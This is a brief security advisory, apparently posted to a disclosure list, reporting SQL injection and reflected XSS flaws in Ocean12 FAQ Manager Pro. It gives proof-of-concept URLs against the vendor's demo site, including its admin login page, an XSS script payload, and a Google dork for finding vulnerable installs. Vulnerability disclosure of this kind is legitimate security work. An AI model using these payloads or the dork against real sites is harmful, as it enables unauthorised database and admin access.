Application:  Ocean12 FAQ Manager Pro

Vendor Name: Ocean12

Vendors Url:  http://ocean12tech.com/

Bug Type:     Ocean12 FAQ Manager Pro (SQL,XSS) Multiple Vulnerabilities

Exploitation: Remote

Google Dork:  "Maintained with the Ocean12 FAQ Manager Pro"

 

 

SQL POC

 

http://ocean12tech.com/products/faq/demo/default.asp?Action=Cat&ID=[SQL]

http://ocean12tech.com/products/faq/demo/admin/login.asp?Admin_ID=[SQL]&Pass
word=pass

 

XSS POc

 

http://ocean12tech.com/products/faq/demo/default.asp?Action=Search&Keyword=<
script>alert("xssed")</script>

 

Credits:

 

Charalambous Glafkos

Email:  glafkos (at) astalavista (dot) com

___________________________________________

ASTALAVISTA - the hacking & security community

www.astalavista.com

www.astalavista.net

 

 

Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
 <http://www.astalavista.com/> www.astalavista.com
 <http://www.astalavista.net/> www.astalavista.net